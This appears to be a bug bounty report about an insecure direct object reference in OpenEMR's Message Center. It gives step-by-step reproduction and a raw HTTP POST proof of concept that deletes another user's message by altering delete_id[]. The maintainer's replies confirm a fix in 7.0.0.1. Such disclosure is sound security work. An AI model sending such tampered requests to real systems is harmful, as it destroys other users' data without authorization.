IDOR leads to delete messages in Message Center of others. in openemr/openemr

Valid

Reported on

Aug 2nd 2022


Description

I observed that users can delete messages in other's Message Center by changing delete_id parameter to delete_id value of message which belongs to other.

Step:

  • Login with Physician account and determine delete_id[] of messages in Physician's Message Center
  • Login with Clinician account.
  • Go to Clinician 's Message Center, delete a message in Message Center and use Burpsuite to intercept this request.
  • Modify delete_id[] to delete_id[] of message which belongs to Physician's Message Center.
  • Message with corresponding delete_id[] in Physicican's Message Center will be deleted.

Proof of Concept

POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close

task=delete&delete_id%5B%5D=7

Impact

Attacker can delete messages of in Message Center of any user. Victim may not see any message from other.

We are processing your report and will contact the openemr team within 24 hours. 2 months ago
Lê Thị Mỹ Duyên modified the report
2 months ago
We have contacted a member of the openemr team and are waiting to hear back 2 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 2 months ago
Brady Miller validated this vulnerability 2 months ago

Thanks for the fix. A preliminary fix has been posted in commit 9c430413101ab170c83ab4aa2d880ecdc170e815

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 1-3 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

Lê Thị Mỹ Duyên has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
2 months ago

Maintainer


to clarify above comment, meant to initially state "Thanks for the report!"

Brady Miller confirmed that a fix has been merged on 9c4304 a month ago
The fix bounty has been dropped
Brady Miller
a month ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

to join this conversation